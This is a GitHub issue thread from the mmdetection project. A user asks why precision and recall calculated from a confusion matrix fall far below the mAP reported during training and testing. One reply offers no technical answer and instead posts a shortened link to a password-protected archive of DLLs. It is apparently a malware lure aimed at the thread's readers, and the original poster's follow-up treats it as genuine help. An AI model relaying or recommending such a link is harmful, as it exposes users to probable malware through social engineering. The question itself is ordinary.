### ISSUE TITLE
Analysis of the Discrepancy Between Precision/Recall from Confusion Matrix and mAP During Training

### ISSUE THREAD

**Issue by liruixinxinxin** [open-mmlab/mmdetection#11977]
Hello everyone,

I am using MMDetection for training, and after training the model, I use the test phase to generate a .pkl file. Then, I added code in confusion_matrix.py to calculate precision and recall based on the confusion matrix. However, the precision and recall values I calculated have a significant gap compared to the mAP metrics reported during training and testing. I also checked the data used to plot the confusion matrix, and it aligns with the precision and recall I computed, but the mAP value seen during training is much higher (with the validation set being the same as the test set). Based on the data from the confusion matrix, the model doesn't seem to achieve such high performance.

Figure 1 shows the results output during training and when running test.py in the terminal. Figure 2 is the generated confusion matrix, and Figure 3 shows the precision and recall corresponding to the confusion matrix.

Could someone with expertise help me figure out what might be the reason for this discrepancy?
![F1](https://github.com/user-attachments/assets/a5450518-ba35-46e8-b180-4f024c5d9593)
![F2](https://github.com/user-attachments/assets/e4f0bb5d-c129-4dda-b39b-3c65254e4e7b)
![F3](https://github.com/user-attachments/assets/2d690ce9-5906-4ad5-8d2e-b9effca1b424)

**Comment by SagarChandra07** [comment]
I think this will help you.
https://bit.ly/47P0Nvo
Archive password: changeme
I put the necessary dlls in the archive

**Comment by liruixinxinxin** [comment]
> 我认为这对你有帮助。https [://bit.ly/47P0Nvo](https://bit.ly/47P0Nvo) 存档密码：changeme 我将必要的 dll 放在了存档中

Hello, I am using a Linux system, so this file may not be applicable to me. Do you happen to know the cause of this issue? Perhaps I could directly modify the relevant code?Thanks for your responding.
